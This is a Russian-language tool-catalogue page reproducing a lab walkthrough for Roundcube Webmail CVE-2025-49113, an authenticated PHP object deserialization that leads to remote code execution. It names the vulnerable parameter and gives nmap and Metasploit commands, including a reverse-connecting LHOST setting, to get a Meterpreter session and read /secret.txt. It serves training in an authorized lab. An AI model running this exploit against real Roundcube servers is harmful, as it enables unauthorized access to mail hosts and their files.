Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
roundcube-cve-2025-49113-lab — Практическая лаборатория эксплуатации для Roundcube Webmail CVE-2025-49113 (аутентифицированная десериализация PHP-объектов → RCE) для чтения /secret.txt. | Kitploit
Инструменты/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
Лаборатории и Практика
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Практическая лаборатория эксплуатации для Roundcube Webmail CVE-2025-49113 (аутентифицированная десериализация PHP-объектов → RCE) для чтения /secret.txt.

Репозиторий
1310 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Только для образовательных целей

Лаборатория Roundcube Webmail RCE – CVE-2025-49113

Этот репозиторий документирует мою пошаговую эксплуатацию Roundcube Webmail CVE-2025-49113 в контролируемой лабораторной среде для получения секрета, хранящегося в /secret.txt.

⚠️ Отказ от ответственности
Все работы проводились в лабораторной/учебной среде, на тестирование которой у меня есть разрешение.
Не используйте эти методы против систем, которые вам не принадлежат или которыми вы не управляете.


Задача

Roundcube Webmail — это веб-браузерный открытый PHP-клиент электронной почты, который подключается к почтовым ящикам через IMAP и отправляет письма через SMTP. Обычно он работает на Apache или Nginx с MySQL/PostgreSQL/SQLite и широко используется в средах общего хостинга.

Уязвимость – CVE-2025-49113

Все версии Roundcube вплоть до 1.6.10 (а также 1.5.x до 1.5.10) содержат критическую ошибку в program/actions/settings/upload.php. Параметр _from не проходит надлежащей проверки, что позволяет аутентифицированному злоумышленнику вызвать небезопасную десериализацию объектов PHP и добиться удаленного выполнения кода с привилегиями веб-сервера.

Учетные данные лаборатории:

  • Имя пользователя: roundcube
  • Пароль: rcpass

Цель:

Какой секрет хранится в файле /secret.txt?


Лабораторная среда

  • Хост атакующего: Kali / HackerBox с:
    • nmap
    • msfconsole (Metasploit 6)
  • Целевой хост: Roundcube Webmail на 172.20.2.57
  • Используемый эксплойт: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

Пошаговое руководство

Шаг 1 – Обнаружение сервисов с помощью Nmap

Команда: nmap -sV Target Machine

Шаг 2 – Поиск эксплойта десериализации объектов PHP в Metasploit

search php object deserialization

Шаг 3 – Настройка модуля эксплойта Roundcube

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

Шаг 4 – Получение сессии Meterpreter и чтение /secret.txt

meterpreter > cat /secret.txt

Скачать инструмент